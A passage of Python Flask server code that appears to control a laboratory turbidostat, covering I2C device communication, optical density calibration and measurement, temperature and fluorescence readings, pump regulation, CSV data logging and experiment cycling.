toggle=int(toggle)
LEDChoice=sysData[M]['Light']['Excite']
if (toggle==1 and sysData[M]['Light']['ON']==1):
SetOutputOn(M,LEDChoice,1)
else:
SetOutputOn(M,LEDChoice,0)
return 0
@application.route("/CharacteriseDevice/<M>/<Program>",methods=['POST'])
def CharacteriseDevice(M,Program):
# THis umbrella function is used to run the actual characteriseation function in a thread to prevent GUnicorn worker timeout.
Program=str(Program)
if (Program=='C1'):
cthread=Thread(target = CharacteriseDevice2, args=(M))
cthread.setDaemon(True)
cthread.start()
return('',204)
def CharacteriseDevice2(M):
global sysData
global sysItems
print('In1')
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
result= { 'LEDA' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDB' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDC' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDD' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDE' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDF' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDG' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LASER650' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
}
print('Got in!')
bands=['nm410' ,'nm440','nm470','nm510','nm550','nm583','nm620','nm670','CLEAR']
powerlevels=[0,0.01,0.02,0.03,0.04,0.05,0.06,0.07,0.08,0.09,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0]
items= ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG','LASER650']
gains=['x4','x4','x4','x4','x4','x4','x4','x1']
gi=-1
for item in items:
gi=gi+1
for power in powerlevels:
SetOutputTarget(M,item,power)
SetOutputOn(M,item,1)
GetSpectrum(M,gains[gi])
SetOutputOn(M,item,0)
print(item + ' ' + str(power))
for band in bands:
result[item][band].append(int(sysData[M]['AS7341']['spectrum'][band]))
addTerminal(M,'Measured Item = ' + str(item) + ' at power ' + str(power))
time.sleep(0.05)
filename = 'characterisation_data_' + M + '.txt'
f = open(filename,'w')
simplejson.dump(result,f)
f.close()
return
def I2CCom(M,device,rw,hl,data1,data2,SMBUSFLAG):
#Function used to manage I2C bus communications for ALL devices.
M=str(M) #Turbidostat to write to
device=str(device) #Name of device to be written to
rw=int(rw) #1 if read, 0 if write
hl=int(hl) #8 or 16
SMBUSFLAG=int(SMBUSFLAG) # If this flag is set to 1 it means we are communuicating with an SMBUs device.
data1=int(data1) #First data/register
if hl<20:
data2=int(data2) #First data/register
global sysItems
global sysData
global sysDevices
if(sysData[M]['present']==0): #Something stupid has happened in software if this is the case!
print(str(datetime.now()) + ' Trying to communicate with absent device - bug in software!. Disabling hardware and software!')
sysItems['Watchdog']['ON']=0 #Basically this will crash all the electronics and the software.
out=0
tries=-1
os._exit(4)
#cID=str(M)+str(device)+'d'+str(data1)+'d'+str(data2) # This is an ID string for the communication that we are trying to send - not used at present
#Any time a thread gets to this point it will wait until the lock is free. Then, only one thread at a time will advance.
lock.acquire()
#We now connect the multiplexer to the appropriate device to allow digital communications.
tries=0
while(tries!=-1):
try:
sysItems['Multiplexer']['device'].write8(int(0x00),int(sysItems['Multiplexer'][M],2)) #We have established connection to correct device.
check=(sysItems['Multiplexer']['device'].readRaw8()) #We check that the Multiplexer is indeed connected to the correct channel.
if(check==int(sysItems['Multiplexer'][M],2)):
tries=-1
else:
tries=tries+1
time.sleep(0.02)
print(str(datetime.now()) + ' Multiplexer didnt switch ' + str(tries) + " times on " + str(M))
except: #If there is an error in the above.
tries=tries+1
time.sleep(0.02)
print(str(datetime.now()) + ' Failed Multiplexer Comms ' + str(tries) + " times")
if (tries>2):
try:
sysItems['Multiplexer']['device'].write8(int(0x00),int(0x00)) #Disconnect multiplexer.
print(str(datetime.now()) + 'Disconnected multiplexer on ' + str(M) + ', trying to connect again.')
except:
print(str(datetime.now()) + 'Failed to recover multiplexer on device ' + str(M))
if (tries==5 or tries==10 or tries==15):
toggleWatchdog() #Flip the watchdog pin to ensure it is working.
GPIO.output('P8_15', GPIO.LOW) #Flip the Multiplexer RESET pin. Note this reset function works on Control Board V1.2 and later.
time.sleep(0.1)
GPIO.output('P8_15', GPIO.HIGH)
time.sleep(0.1)
print(str(datetime.now()) + 'Did multiplexer hard-reset on ' + str(M))
if tries>20: #If it has failed a number of times then likely something is seriously wrong, so we crash the software.
sysItems['Watchdog']['ON']=0 #Basically this will crash all the electronics and the software.
out=0
print(str(datetime.now()) + 'Failed to communicate to Multiplexer 20 times. Disabling hardware and software!')
tries=-1
os._exit(4)
time.sleep(0.0005)
out=0;
tries=0
while(tries!=-1): #We now do appropriate read/write on the bus.
try:
if SMBUSFLAG==0:
if rw==1:
if hl==8:
out=int(sysDevices[M][device]['device'].readU8(data1))
elif(hl==16):
out=int(sysDevices[M][device]['device'].readU16(data1,data2))
else:
if hl==8:
sysDevices[M][device]['device'].write8(data1,data2)
out=1
elif(hl==16):
sysDevices[M][device]['device'].write16(data1,data2)
out=1
elif SMBUSFLAG==1:
out=sysDevices[M][device]['device'].read_word_data(sysDevices[M][device]['address'],data1)
tries=-1
except: #If the above fails then we can try again (a limited number of times)
tries=tries+1
if (device!="ThermometerInternal"):
print(str(datetime.now()) + ' Failed ' + str(device) + ' comms ' + str(tries) + " times on device " + str(M) )
time.sleep(0.02)
if (device=='AS7341'):
print(str(datetime.now()) + ' Failed AS7341 in I2CCom while trying to send ' + str(data1) + " and " + str(data2))
out=-1
tries=-1
if (tries>2 and device=="ThermometerInternal"): #We don't allow the internal thermometer to fail, since this is what we are using to see if devices are plugged in at all.
out=0
sysData[M]['present']=0
tries=-1
if tries>10: #In this case something else has gone wrong, so we panic.
sysItems['Watchdog']['ON']=0 #Basically this will crash all the electronics and the software.
out=0
sysData[M]['present']=0
print(str(datetime.now()) + 'Failed to communicate to a device 10 times. Disabling hardware and software!')
tries=-1
os._exit(4)
time.sleep(0.0005)
try:
sysItems['Multiplexer']['device'].write8(int(0x00),int(0x00)) #Disconnect multiplexer with each iteration.
except:
print(str(datetime.now()) + 'Failed to disconnect multiplexer on device ' + str(M))
lock.release() #Bus lock is released so next command can occur.
return(out)
@application.route("/CalibrateOD/<item>/<M>/<value>/<value2>",methods=['POST'])
def CalibrateOD(M,item,value,value2):
#Used to calculate calibration value for OD measurements.
global sysData
item = str(item)
ODRaw = float(value)
ODActual = float(value2)
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
device=sysData[M]['OD']['device']
if (device=='LASER650'):
a=sysData[M]['OD0']['LASERa']#Retrieve the calibration factors for OD.
b=sysData[M]['OD0']['LASERb']
if (ODActual<0):
ODActual=0
print(str(datetime.now()) + "You put a negative OD into calibration! Setting it to 0")
raw=((ODActual/a + (b/(2*a))**2)**0.5) - (b/(2*a)) #THis is performing the inverse function of the quadratic OD calibration.
OD0=(10.0**raw)*ODRaw
if (OD0<sysData[M][item]['min']):
OD0=sysData[M][item]['min']
print(str(datetime.now()) + 'OD calibration value seems too low?!')
if (OD0>sysData[M][item]['max']):
OD0=sysData[M][item]['max']
print(str(datetime.now()) + 'OD calibration value seems too high?!')
sysData[M][item]['target']=OD0
print(str(datetime.now()) + "Calibrated OD")
elif (device=='LEDF'):
a=sysData[M]['OD0']['LEDFa']#Retrieve the calibration factors for OD.
if (ODActual<0):
ODActual=0
print("You put a negative OD into calibration! Setting it to 0")
if (M=='M0'):
CF=1299.0
elif (M=='M1'):
CF=1206.0
elif (M=='M2'):
CF=1660.0
elif (M=='M3'):
CF=1494.0
#raw=(ODActual)/a #THis is performing the inverse function of the linear OD calibration.
#OD0=ODRaw - raw*CF
OD0=ODRaw/ODActual
print(OD0)
if (OD0<sysData[M][item]['min']):
OD0=sysData[M][item]['min']
print('OD calibration value seems too low?!')
if (OD0>sysData[M][item]['max']):
OD0=sysData[M][item]['max']
print('OD calibration value seems too high?!')
sysData[M][item]['target']=OD0
print("Calibrated OD")
elif (device=='LEDA'):
a=sysData[M]['OD0']['LEDAa']#Retrieve the calibration factors for OD.
if (ODActual<0):
ODActual=0
print("You put a negative OD into calibration! Setting it to 0")
if (M=='M0'):
CF=422
elif (M=='M1'):
CF=379
elif (M=='M2'):
CF=574
elif (M=='M3'):
CF=522
#raw=(ODActual)/a #THis is performing the inverse function of the linear OD calibration.
#OD0=ODRaw - raw*CF
OD0=ODRaw/ODActual
print(OD0)
if (OD0<sysData[M][item]['min']):
OD0=sysData[M][item]['min']
print('OD calibration value seems too low?!')
if (OD0>sysData[M][item]['max']):
OD0=sysData[M][item]['max']
print('OD calibration value seems too high?!')
sysData[M][item]['target']=OD0
print("Calibrated OD")
return ('', 204)
@application.route("/MeasureOD/<M>",methods=['POST'])
def MeasureOD(M):
#Measures laser transmission and calculates calibrated OD from this.
global sysData
global sysItems
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
device=sysData[M]['OD']['device']
if (device=='LASER650'):
out=GetTransmission(M,'LASER650',['CLEAR'],1,255)
sysData[M]['OD0']['raw']=float(out[0])
a=sysData[M]['OD0']['LASERa']#Retrieve the calibration factors for OD.
b=sysData[M]['OD0']['LASERb']
try:
raw=math.log10(sysData[M]['OD0']['target']/sysData[M]['OD0']['raw'])
sysData[M]['OD']['current']=raw*b + raw*raw*a
except:
sysData[M]['OD']['current']=0;
print(str(datetime.now()) + ' OD Measurement exception on ' + str(device))
elif (device=='LEDF'):
out=GetTransmission(M,'LEDF',['CLEAR'],7,255)
sysData[M]['OD0']['raw']=out[0]
a=sysData[M]['OD0']['LEDFa']#Retrieve the calibration factors for OD.
try:
if (M=='M0'):
CF=1299.0
elif (M=='M1'):
CF=1206.0
elif (M=='M2'):
CF=1660.0
elif (M=='M3'):
CF=1494.0
#raw=out[0]/CF - sysData[M]['OD0']['target']/CF
raw=out[0]/sysData[M]['OD0']['target']
sysData[M]['OD']['current']=raw
except:
sysData[M]['OD']['current']=0;
print(str(datetime.now()) + ' OD Measurement exception on ' + str(device))
elif (device=='LEDA'):
out=GetTransmission(M,'LEDA',['CLEAR'],7,255)
sysData[M]['OD0']['raw']=out[0]
a=sysData[M]['OD0']['LEDAa']#Retrieve the calibration factors for OD.
try:
if (M=='M0'):
CF=422.0
elif (M=='M1'):
CF=379.0
elif (M=='M2'):
CF=574.0
elif (M=='M3'):
CF=522.0
#raw=out[0]/CF - sysData[M]['OD0']['target']/CF
raw=out[0]/sysData[M]['OD0']['target']
#sysData[M]['OD']['current']=raw*a
sysData[M]['OD']['current']=raw
except:
sysData[M]['OD']['current']=0;
print(str(datetime.now()) + ' OD Measurement exception on ' + str(device))
return ('', 204)
@application.route("/MeasureFP/<M>",methods=['POST'])
def MeasureFP(M):
#Responsible for measuring each of the active Fluorescent proteins.
global sysData
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
for FP in ['FP1','FP2','FP3']:
if sysData[M][FP]['ON']==1:
Gain=int(sysData[M][FP]['Gain'][1:])
out=GetTransmission(M,sysData[M][FP]['LED'],[sysData[M][FP]['BaseBand'],sysData[M][FP]['Emit1Band'],sysData[M][FP]['Emit2Band']],Gain,255)
sysData[M][FP]['Base']=float(out[0])
if (sysData[M][FP]['Base']>0):
sysData[M][FP]['Emit1']=float(out[1])/sysData[M][FP]['Base']
sysData[M][FP]['Emit2']=float(out[2])/sysData[M][FP]['Base']
else:#This might happen if you try to measure in CLEAR whilst also having CLEAR as baseband!
sysData[M][FP]['Emit1']=float(out[1])
sysData[M][FP]['Emit2']=float(out[2])
return ('', 204)
@application.route("/MeasureTemp/<which>/<M>",methods=['POST'])
def MeasureTemp(M,which):
#Used to measure temperature from each thermometer.
global sysData
global sysItems
if (M=="0"):
M=sysItems['UIDevice']
M=str(M)
which='Thermometer' + str(which)
if (which=='ThermometerInternal' or which=='ThermometerExternal'):
getData=I2CCom(M,which,1,16,0x05,0,0)
getDataBinary=bin(getData)
tempData=getDataBinary[6:]
temperature=float(int(tempData,2))/16.0
elif(which=='ThermometerIR'):
getData=I2CCom(M,which,1,0,0x07,0,1)
temperature = (getData*0.02) - 273.15
if sysData[M]['present']==0:
temperature=0.0
if temperature>100.0:#It seems sometimes the IR thermometer returns a value of 1000 due to an error. This prevents that.
temperature=sysData[M][which]['current']
sysData[M][which]['current']=temperature
return ('', 204)
def setPWM(M,device,channels,fraction,ConsecutiveFails):
#Sets up the PWM chip (either the one in the reactor or on the pump board)
global sysItems
global sysDevices
if sysDevices[M][device]['startup']==0: #The following boots up the respective PWM device to the correct frequency. Potentially there is a bug here; if the device loses power after this code is run for the first time it may revert to default PWM frequency.
I2CCom(M,device,0,8,0x00,0x10,0) #Turns off device. Also disables all-call functionality at bit 0 so it won't respond to address 0x70
I2CCom(M,device,0,8,0x04,0xe6,0) #Sets SubADDR3 of the PWM chips to be 0x73 instead of 0x74 to avoid any potential collision with the multiplexer @ 0x74
I2CCom(M,device,0,8,0xfe,sysDevices[M][device]['frequency'],0) #Sets frequency of PWM oscillator.
sysDevices[M][device]['startup']=1
I2CCom(M,device,0,8,0x00,0x00,0) #Turns device on
timeOn=int(fraction*4095.99)
I2CCom(M,device,0,8,channels['ONL'],0x00,0)
I2CCom(M,device,0,8,channels['ONH'],0x00,0)
OffVals=bin(timeOn)[2:].zfill(12)
HighVals='0000' + OffVals[0:4]
LowVals=OffVals[4:12]
I2CCom(M,device,0,8,channels['OFFL'],int(LowVals,2),0)
I2CCom(M,device,0,8,channels['OFFH'],int(HighVals,2),0)
if (device=='Pumps'):
I2CCom(M,device,0,8,channels['ONL'],0x00,0)
I2CCom(M,device,0,8,channels['ONH'],0x00,0)
I2CCom(M,device,0,8,channels['OFFL'],int(LowVals,2),0)
I2CCom(M,device,0,8,channels['OFFH'],int(HighVals,2),0)
else:
CheckLow=I2CCom(M,device,1,8,channels['OFFL'],-1,0)
CheckHigh=I2CCom(M,device,1,8,channels['OFFH'],-1,0)
CheckLowON=I2CCom(M,device,1,8,channels['ONL'],-1,0)
CheckHighON=I2CCom(M,device,1,8,channels['ONH'],-1,0)
if(CheckLow!=(int(LowVals,2)) or CheckHigh!=(int(HighVals,2)) or CheckHighON!=int(0x00) or CheckLowON!=int(0x00)): #We check to make sure it has been set to appropriate values.
ConsecutiveFails=ConsecutiveFails+1
print(str(datetime.now()) + ' Failed transmission test on ' + str(device) + ' ' + str(ConsecutiveFails) + ' times consecutively on device ' + str(M) )
if ConsecutiveFails>10:
sysItems['Watchdog']['ON']=0 #Basically this will crash all the electronics and the software.
print(str(datetime.now()) + 'Failed to communicate to PWM 10 times. Disabling hardware and software!')
os._exit(4)
else:
time.sleep(0.1)
sysItems['FailCount']=sysItems['FailCount']+1
setPWM(M,device,channels,fraction,ConsecutiveFails)
def csvData(M):
#Used to format current data and write a new row to CSV file output. Note if you want to record any additional parameters/measurements then they need to be added to this function.
global sysData
M=str(M)
fieldnames = ['exp_time','od_measured','od_setpoint','od_zero_setpoint','thermostat_setpoint','heating_rate',
'internal_air_temp','external_air_temp','media_temp','opt_gen_act_int','pump_1_rate','pump_2_rate',
'pump_3_rate','pump_4_rate','media_vol','stirring_rate','LED_395nm_setpoint','LED_457nm_setpoint',
'LED_500nm_setpoint','LED_523nm_setpoint','LED_595nm_setpoint','LED_623nm_setpoint',
'LED_6500K_setpoint','laser_setpoint','LED_UV_int','FP1_base','FP1_emit1','FP1_emit2','FP2_base',
'FP2_emit1','FP2_emit2','FP3_base','FP3_emit1','FP3_emit2','custom_prog_param1','custom_prog_param2',
'custom_prog_param3','custom_prog_status','zigzag_target','growth_rate']
row=[sysData[M]['time']['record'][-1],
sysData[M]['OD']['record'][-1],
sysData[M]['OD']['targetrecord'][-1],
sysData[M]['OD0']['target'],
sysData[M]['Thermostat']['record'][-1],
sysData[M]['Heat']['target']*float(sysData[M]['Heat']['ON']),
sysData[M]['ThermometerInternal']['record'][-1],
sysData[M]['ThermometerExternal']['record'][-1],
sysData[M]['ThermometerIR']['record'][-1],
sysData[M]['Light']['record'][-1],
sysData[M]['Pump1']['record'][-1],
sysData[M]['Pump2']['record'][-1],
sysData[M]['Pump3']['record'][-1],
sysData[M]['Pump4']['record'][-1],
sysData[M]['Volume']['target'],
sysData[M]['Stir']['target']*sysData[M]['Stir']['ON'],]
for LED in ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG','LASER650']:
row=row+[sysData[M][LED]['target']]
row=row+[sysData[M]['UV']['target']*sysData[M]['UV']['ON']]
for FP in ['FP1','FP2','FP3']:
if sysData[M][FP]['ON']==1:
row=row+[sysData[M][FP]['Base']]
row=row+[sysData[M][FP]['Emit1']]
row=row+[sysData[M][FP]['Emit2']]
else:
row=row+([0.0, 0.0, 0.0])
row=row+[sysData[M]['Custom']['param1']*float(sysData[M]['Custom']['ON'])]
row=row+[sysData[M]['Custom']['param2']*float(sysData[M]['Custom']['ON'])]
row=row+[sysData[M]['Custom']['param3']*float(sysData[M]['Custom']['ON'])]
row=row+[sysData[M]['Custom']['Status']*float(sysData[M]['Custom']['ON'])]
row=row+[sysData[M]['Zigzag']['target']*float(sysData[M]['Zigzag']['ON'])]
row=row+[sysData[M]['GrowthRate']['current']*sysData[M]['Zigzag']['ON']]
#Following can be uncommented if you are recording ALL spectra for e.g. biofilm experiments
#bands=['nm410' ,'nm440','nm470','nm510','nm550','nm583','nm620','nm670','CLEAR','NIR']
#items= ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG','LASER650']
#for item in items:
# for band in bands:
# row=row+[sysData[M]['biofilm'][item][band]]
filename = sysData[M]['Experiment']['startTime'] + '_' + M + '_data' + '.csv'
filename=filename.replace(":","_")
lock.acquire() #We are avoiding writing to a file at the same time as we do digital communications, since it might potentially cause the computer to lag and consequently data transfer to fail.
if os.path.isfile(filename) is False: #Only if we are starting a fresh file
if (len(row) == len(fieldnames)): #AND the fieldnames match up with what is being written.
with open(filename, 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerow(fieldnames)
else:
print('CSV_WRITER: mismatch between column num and header num')
with open(filename, 'a') as csvFile: # Here we append the new data to our CSV file.
writer = csv.writer(csvFile)
writer.writerow(row)
csvFile.close()
lock.release()
def downsample(M):
#In order to prevent the UI getting too laggy, we downsample the stored data every few hours. Note that this doesnt downsample that which has already been written to CSV, so no data is ever lost.
global sysData
M=str(M)
#We now generate a new time vector which is downsampled at half the rate of the previous one
time=np.asarray(sysData[M]['time']['record'])
newlength=int(round(len(time)/2,2)-1)
tnew=np.linspace(time[0],time[-11],newlength)
tnew=np.concatenate([tnew,time[-10:]])
#In the following we make a new array, index, which has the indices at which we want to resample our existing data vectors.
i=0
index=np.zeros((len(tnew),),dtype=int)
for timeval in tnew:
idx = np.searchsorted(time, timeval, side="left")
if idx > 0 and (idx == len(time) or np.abs(timeval - time[idx-1]) < np.abs(timeval - time[idx])):
index[i]=idx-1
else:
index[i]=idx
i=i+1
sysData[M]['time']['record']=downsampleFunc(sysData[M]['time']['record'],index)
sysData[M]['OD']['record']=downsampleFunc(sysData[M]['OD']['record'],index)
sysData[M]['OD']['targetrecord']=downsampleFunc(sysData[M]['OD']['targetrecord'],index)
sysData[M]['Thermostat']['record']=downsampleFunc(sysData[M]['Thermostat']['record'],index)
sysData[M]['Light']['record']=downsampleFunc(sysData[M]['Light']['record'],index)
sysData[M]['ThermometerInternal']['record']=downsampleFunc(sysData[M]['ThermometerInternal']['record'],index)
sysData[M]['ThermometerExternal']['record']=downsampleFunc(sysData[M]['ThermometerExternal']['record'],index)
sysData[M]['ThermometerIR']['record']=downsampleFunc(sysData[M]['ThermometerIR']['record'],index)
sysData[M]['Pump1']['record']=downsampleFunc(sysData[M]['Pump1']['record'],index)
sysData[M]['Pump2']['record']=downsampleFunc(sysData[M]['Pump2']['record'],index)
sysData[M]['Pump3']['record']=downsampleFunc(sysData[M]['Pump3']['record'],index)
sysData[M]['Pump4']['record']=downsampleFunc(sysData[M]['Pump4']['record'],index)
sysData[M]['GrowthRate']['record']=downsampleFunc(sysData[M]['GrowthRate']['record'],index)
for FP in ['FP1','FP2','FP3']:
sysData[M][FP]['BaseRecord']=downsampleFunc(sysData[M][FP]['BaseRecord'],index)
sysData[M][FP]['Emit1Record']=downsampleFunc(sysData[M][FP]['Emit1Record'],index)
sysData[M][FP]['Emit2Record']=downsampleFunc(sysData[M][FP]['Emit2Record'],index)
def downsampleFunc(datain,index):
#This function Is used to downsample the arrays, taking the points selected by the index vector.
datain=list(datain)
newdata=[]
newdata=np.zeros((len(index),),dtype=float)
i=0
for loc in list(index):
newdata[i]=datain[int(loc)]
i=i+1
return list(newdata)
def RegulateOD(M):
#Function responsible for turbidostat functionality (OD control)
global sysData
global sysItems
M=str(M)
if (sysData[M]['Zigzag']['ON']==1):
TargetOD=sysData[M]['OD']['target']
Zigzag(M) #Function that calculates new target pump rates, and sets pumps to desired rates.
Pump1Current=abs(sysData[M]['Pump1']['target'])
Pump2Current=abs(sysData[M]['Pump2']['target'])
Pump1Direction=sysData[M]['Pump1']['direction']
Pump2Direction=sysData[M]['Pump2']['direction']
ODNow=sysData[M]['OD']['current']
ODTarget=sysData[M]['OD']['target']
if (ODTarget<=0): #There could be an error on the log operationif ODTarget is 0!
ODTarget=0.000001
errorTerm=ODTarget-ODNow
Volume=sysData[M]['Volume']['target']
PercentPerMin=4*60/Volume #Gain parameter to convert from pump rate to rate of OD reduction.
if sysData[M]['Experiment']['cycles']<3:
Pump1=0 #In first few cycles we do precisely no pumping.
elif len(sysData[M]['time']['record']) < 2:
Pump1=0 #In first few cycles we do precisely no pumping.
addTerminal(M, "Warning: Tried to calculate time elapsed with fewer than two " +\
"timepoints recorded. If you see this message a lot, there may be " +\
"a more serious problem.")
else:
ODPast=sysData[M]['OD']['record'][-1]
timeElapsed=((sysData[M]['time']['record'][-1])-(sysData[M]['time']['record'][-2]))/60.0 #Amount of time betwix measurements in minutes
if (ODNow>0):
try:
NewGrowth = math.log((ODTarget)/(ODNow))/timeElapsed
except:
NewGrowth=0.0
else:
NewGrowth=0.0
Pump1=-1.0*NewGrowth/PercentPerMin
#Next Section is Integral Control
ODerror=ODNow-ODTarget
# Integrator 1 - resoponsible for short-term integration to overcome troubles if an input pump makes a poor seal.
ODIntegral=sysData[M]['OD']['Integral']
if ODerror<0.01:
ODIntegral=0
elif (abs(ODNow-ODPast)<0.05 and ODerror>0.025): #preventing massive accidental jumps causing trouble with this integral term.
ODIntegral=ODIntegral+0.1*ODerror
sysData[M]['OD']['Integral']=ODIntegral
# Integrator 2
ODIntegral2=sysData[M]['OD']['Integral2']
if (abs(ODerror)>0.1 and abs(ODNow-ODPast)<0.05):
ODIntegral2=0
elif (abs(ODNow-ODPast)<0.1):
ODIntegral2=ODIntegral2+0.01*ODerror
Pump1=Pump1*0.7 #This is essentially enforcing a smaller Proportional gain when we are near to OD setpoint.
sysData[M]['OD']['Integral2']=ODIntegral2
Pump1=Pump1+ODIntegral+ODIntegral2
if (ODNow-ODPast)>0.04: #This is to counteract noisy jumps in OD measurements from causing mayhem in the regulation algorithm.
Pump1=0.0
#Make sure values are in appropriate range. We want to limit the maximum size of pump1 to prevent it from overflowing.
if(Pump1>0.02):
Pump1=0.02
elif(Pump1<0):
Pump1=0.0
if(sysData[M]['Chemostat']['ON']==1):
Pump1=float(sysData[M]['Chemostat']['p1'])
#Set new Pump targets
sysData[M]['Pump1']['target']=Pump1*Pump1Direction
sysData[M]['Pump2']['target']=(Pump1*4+0.07)*Pump2Direction
if(sysData[M]['Experiment']['cycles']%5==1): #Every so often we do a big output pump to make sure tubes are clear.
sysData[M]['Pump2']['target']=0.25*sysData[M]['Pump2']['direction']
if (sysData[M]['Experiment']['cycles']>15):
#This section is to check if we have added any liquid recently, if not, then we dont run pump 2 since it won't be needed.
pastpumping=abs(sysData[M]['Pump1']['target'])
for pv in range(-10,-1):
pastpumping=pastpumping+abs(sysData[M]['Pump1']['record'][pv])
if pastpumping==0.0:
sysData[M]['Pump2']['target']=0.0
sysData[M]['Pump1']['target']=0.0 #This should be equal to 0 anyway.
SetOutputOn(M,'Pump1',1)
SetOutputOn(M,'Pump2',1)
if (sysData[M]['Zigzag']['ON']==1): #If the zigzag growth estimation is running then we change OD setpoint appropriately.
try:
sysData[M]['OD']['target']=TargetOD
except:
print('Somehow you managed to activate Zigzag at a sub-optimal time')
#Do nothing
return
def Zigzag(M):
#This function dithers OD in a "zigzag" pattern, and estimates growthrate. This function is only called when ZigZag mode is active.
global sysData
global sysItems
M=str(M)
centre=sysData[M]['OD']['target']
current=sysData[M]['OD']['current']
zig=sysData[M]['Zigzag']['Zig']
iteration=sysData[M]['Experiment']['cycles']
try:
last=sysData[M]['OD']['record'][-1]
except: #This will happen if you activate Zigzag in first control iteration!
last=current
if (current<centre-zig and last<centre):
if(sysData[M]['Zigzag']['target']!=5.0):
sysData[M]['Zigzag']['SwitchPoint']=iteration
sysData[M]['Zigzag']['target']=5.0 #an excessively high OD value.
elif (current>centre+zig and last>centre+zig):
sysData[M]['Zigzag']['target']=centre-zig*1.5
sysData[M]['Zigzag']['SwitchPoint']=iteration
sysData[M]['OD']['target']=sysData[M]['Zigzag']['target']
#Subsequent section is for growth estimation.
TimeSinceSwitch=iteration-sysData[M]['Zigzag']['SwitchPoint']
if (iteration>6 and TimeSinceSwitch>5 and current > 0 and last > 0): #The reason we wait a few minutes after starting growth is that new media may still be introduced, it takes a while for the growth to get going.
dGrowthRate=(math.log(current)-math.log(last))*60.0 #Converting to units of 1/hour
sysData[M]['GrowthRate']['current']=sysData[M]['GrowthRate']['current']*0.95 + dGrowthRate*0.05 #We are essentially implementing an online growth rate estimator with learning rate 0.05
return
@application.route("/ExperimentReset",methods=['POST'])
def ExperimentReset():
#Resets parameters/values of a given experiment.
initialise(sysItems['UIDevice'])
return ('', 204)
@application.route("/Experiment/<value>/<M>",methods=['POST'])
def ExperimentStartStop(M,value):
#Stops or starts an experiment.
global sysData
global sysDevices
global sysItems
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
value=int(value)
#Turning it on involves keeping current pump directions,
if (value and (sysData[M]['Experiment']['ON']==0)):
sysData[M]['Experiment']['ON']=1
addTerminal(M,'Experiment Started')
if (sysData[M]['Experiment']['cycles']==0):
now=datetime.now()
timeString=now.strftime("%Y-%m-%d %H:%M:%S")
sysData[M]['Experiment']['startTime']=timeString
sysData[M]['Experiment']['startTimeRaw']=now
sysData[M]['Pump1']['direction']=1.0 #Sets pumps to go forward.
sysData[M]['Pump2']['direction']=1.0
turnEverythingOff(M)
SetOutputOn(M,'Thermostat',1)
sysDevices[M]['Experiment']=Thread(target = runExperiment, args=(M,'placeholder'))
sysDevices[M]['Experiment'].setDaemon(True)
sysDevices[M]['Experiment'].start();
else:
sysData[M]['Experiment']['ON']=0
sysData[M]['OD']['ON']=0
addTerminal(M,'Experiment Stopping at end of cycle')
SetOutputOn(M,'Pump1',0)
SetOutputOn(M,'Pump2',0)
SetOutputOn(M,'Stir',0)
SetOutputOn(M,'Thermostat',0)
return ('', 204)
def runExperiment(M,placeholder):
#Primary function for running an automated experiment.
M=str(M)
global sysData
global sysItems
global sysDevices
sysData[M]['Experiment']['threadCount']=(sysData[M]['Experiment']['threadCount']+1)%100
currentThread=sysData[M]['Experiment']['threadCount']
# Get time running in seconds
now=datetime.now()
elapsedTime=now-sysData[M]['Experiment']['startTimeRaw']
elapsedTimeSeconds=round(elapsedTime.total_seconds(),2)
sysData[M]['Experiment']['cycles']=sysData[M]['Experiment']['cycles']+1
addTerminal(M,'Cycle ' + str(sysData[M]['Experiment']['cycles']) + ' Started')
CycleTime=sysData[M]['Experiment']['cycleTime']
SetOutputOn(M,'Stir',0) #Turning stirring off
time.sleep(5.0) #Wait for liquid to settle.
if (sysData[M]['Experiment']['ON']==0):
turnEverythingOff(M)
sysData[M]['Experiment']['cycles']=sysData[M]['Experiment']['cycles']-1 # Cycle didn't finish, don't count it.
addTerminal(M,'Experiment Stopped')
return
sysData[M]['OD']['Measuring']=1 #Begin measuring - this flag is just to indicate that a measurement is currently being taken.
#We now meausre OD 4 times and take the average to reduce noise when in auto mode!
ODV=0.0
for i in [0, 1, 2, 3]:
MeasureOD(M)
ODV=ODV+sysData[M]['OD']['current']
time.sleep(0.25)
sysData[M]['OD']['current']=ODV/4.0
MeasureTemp(M,'Internal') #Measuring all temperatures
MeasureTemp(M,'External')
MeasureTemp(M,'IR')
MeasureFP(M) #And now fluorescent protein concentrations.
if (sysData[M]['Experiment']['ON']==0): #We do another check post-measurement to see whether we need to end the experiment.
turnEverythingOff(M)
sysData[M]['Experiment']['cycles']=sysData[M]['Experiment']['cycles']-1 # Cycle didn't finish, don't count it.
addTerminal(M,'Experiment Stopped')
return
#Temporary Biofilm Section - the below makes the device all spectral data for all LEDs each cycle.
# bands=['nm410' ,'nm440','nm470','nm510','nm550','nm583','nm620','nm670','CLEAR','NIR']
# items= ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG','LASER650']
